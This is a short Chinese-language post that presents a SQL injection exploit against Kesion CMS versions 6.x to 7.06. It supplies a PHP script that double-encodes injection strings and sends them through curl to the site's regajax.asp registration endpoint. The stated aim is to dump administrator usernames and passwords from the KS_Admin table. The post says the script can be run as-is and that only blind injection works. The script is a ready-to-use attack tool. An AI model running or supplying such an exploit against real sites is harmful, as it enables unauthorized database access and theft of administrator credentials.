科讯kesion 6.x - 7.06 漏洞

本地搭建php+apache后，直接丢工具就可以跑了。

 

<?php

/*

$str = "' union Select top 10 AdminID,UserName&chr(124)&PassWord From KS_Admin";

for ($i=0; $i<=strlen($str); $i++){

        $temp .= "%25".base_convert(ord($str[$i]),10,16);

}

echo $temp."0";

// http://www.xxxx.com /user/reg/regajax.asp?action=getcityoption&province=%2566%2527%2520%256F%2572%2520%2531%253D%2531%25006

// 所有信息

$id = $_GET['id'];

$url = "http://www.xxxx.com /user/reg/regajax.asp?action=getcityoption&province=";

$param = "f' or 1=1 and 1=".$id; // ?id=1

for ($i = 0; $i < strlen($param); $i ++)

{

        $temp .= "%25".base_convert(ord($param[$i]),10,16);

}

$url = $url.$temp."%2500";

//echo $url;

//echo file_get_contents($url);

 

echo GetSources($url);

function GetSources($Url,$User_Agent='',$Referer_Url='') //抓取某个指定的页面

{

//$Url 需要抓取的页面地址

//$User_Agent 需要返回的user_agent信息 如“baiduspider”或“googlebot”

$ch = curl_init();

curl_setopt ($ch, CURLOPT_URL, $Url);

curl_setopt ($ch, CURLOPT_USERAGENT, $User_Agent);

curl_setopt ($ch, CURLOPT_REFERER, $Referer_Url);

curl_setopt($ch, CURLOPT_FOLLOWLOCATION,1);

curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);

$MySources = curl_exec ($ch);

curl_close($ch);

return $MySources;

} -

?>

 

 

 

自己看着修改就是了。

 

这里还有一个问题，php 的file_get_contents不能获取505

错误的具体信息，

所以不能报错注射，只能盲注